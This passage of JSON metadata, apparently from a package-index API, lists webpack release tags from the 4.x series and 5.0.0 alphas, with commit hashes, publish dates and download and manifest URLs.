/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at"